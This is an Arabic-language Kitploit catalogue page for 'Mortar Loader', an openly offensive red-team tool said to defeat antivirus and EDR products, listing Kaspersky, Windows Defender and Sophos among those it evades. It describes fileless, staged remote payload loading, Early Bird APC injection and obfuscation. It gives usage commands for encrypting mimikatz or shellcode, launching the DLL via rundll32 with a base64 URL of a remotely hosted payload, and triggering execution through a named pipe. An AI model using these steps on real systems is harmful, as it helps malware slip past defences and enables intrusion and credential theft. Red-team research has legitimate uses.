Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
mortar — تقنية مراوغة لهزيمة وتحويل اكتشاف ومنع منتجات الأمان (AV/EDR/XDR) | Kitploit
أدوات/GitHubGitHub/0xsp-srd/mortar
أطر الاستغلالتوليد الحمولةالتهرب من IDS/IPSشيل كودالفريق الأحمر
GitHub0xsp-srd/mortar

mortar

تقنية مراوغة لهزيمة وتحويل اكتشاف ومنع منتجات الأمان (AV/EDR/XDR)

عرض المستودع
1.5k238منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Mortar Loader

تقنية تهرب للفريق الأحمر بهدف هزيمة وتحويل مسار اكتشاف ومنع منتجات الأمان. يقوم Mortar Loader بتشفير وفك تشفير PE / Shellcode داخل تدفقات الذاكرة وتنفيذه باستخدام عدة تقنيات حقن.

يستطيع Mortar تجاوز منتجات مكافحة الفيروسات الحديثة وحلول XDR المتقدمة، وقد تم اختباره وتأكيد تجاوزه لما يلي:

  • Kaspersky ✔️
  • ESET AV / EDR ✔️
  • Malewarebytes ✔️
  • Mcafee ✔️
  • Windows defender ✔️
  • Cylance ✔️
  • TrendMicro ✔️
  • Bitdefender ✔️
  • Norton Symantec ✔️
  • Sophos EDR ✔️

الميزات المحدثة

تم إصدار الإصدار الأحدث (v3) بالميزات التالية:

  • تنفيذ بدون ملف مع تحميل ثنائي أو شيلكود مشفر عن بُعد وبمراحل.
  • حقن Early Bird APC.
  • انتحال هوية العملية.
  • دعم الأنابيب المسماة (Named Pipes).
  • إخفاء السلاسل واستدعاءات الدوال.
  • الروتين الفرعي لإعادة التحميل الخفي Mortar.
  • تقنيات تأخير التنفيذ.

لمزيد من الوصف الفني، راجع المقالة التالية: https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html

الاستخدام

المشفر

يقوم المشفر بتشفير شيفرات C ShellCode وثنائيات PE وكتابة المخرجات إلى ملف .enc. يُسمح لك باستخدام أي حمولة (MSF/cobalt/Havoc..إلخ) كما تفضل، طالما أنها من معمارية x64 وليست RAW.

root@kitploit:~
root@kali>./encryptor -f mimikatz.exe -o bin.enc 
root@kali>./encryptor -f shellcode.c -o bin.enc 

مكتبة Mortar Loader

يستفيد الإصدار الأحدث من عدة تقنيات مقترنة بجلب الحمولة عن بُعد، يُوصى بالرجوع إلى المقالة التالية للحصول على مزيد من الرؤى.

للحصول على تعليمات سريعة:

root@kitploit:~
# PE Forking

1. استضف الثنائي المشفر على جهاز بعيد.
2. قم بتشفير الرابط النهائي باستخدام base64.
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. تفعيل تقنية الروتين الفرعي لإعادة التحميل الخفي.

يدعم حالياً حقن Early Bird بالاقتران مع الأنابيب المسماة لاستقبال المتغيرات للتنفيذ النهائي.

root@kitploit:~
1. حقن مكتبة Mortar DLL في عملية بعيدة (حقن DLL، اختطاف، تحميل جانبي).
2. الاتصال بالأنبوب المسمى لتزويد الرابط الخاص بك 
   echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs 
3. سيتم تنفيذ الحمولة بمجرد استلام قيمة صالحة.

التجميع

تمت برمجة المشروع باستخدام FPC (Free Pascal)، وإجراءات التجميع واضحة عن طريق تنزيل وتثبيت Lazarus IDE (https://www.lazarus-ide.org/index.php?page=downloads).

يمكنك تنزيل المشفر من قسم الإصدارات أو تجميعه بسهولة باستخدام Lazarus IDE.

root@kitploit:~
#Debian & Ubuntu 

apt install fpc 
apt install lazarus-ide 

المنشورات

  • الإصدار v1 : https://0xsp.com/security%20research%20&%20development%20(SRD)/defeat-the-castle-bypass-av-advanced-xdr-solutions
  • ميزات Mortar Loader v2 : https://0xsp.com/offensive/mortar-loader-v2/
  • محاضرة CrestCon Asia 2021 : https://www.youtube.com/watch?v=H7EMBz7GLMk

راعي؟

تطوير Mortar أو أي مشروع مشارك هو نتاج وقتي الشخصي.

  • تظهر تقديرك المستمر لعملي.
  • ستحصل على وصول مبكر للإصدارات الأولية.
  • اطرح الأسئلة / سيتم الرد عليها.
تنزيل الأداة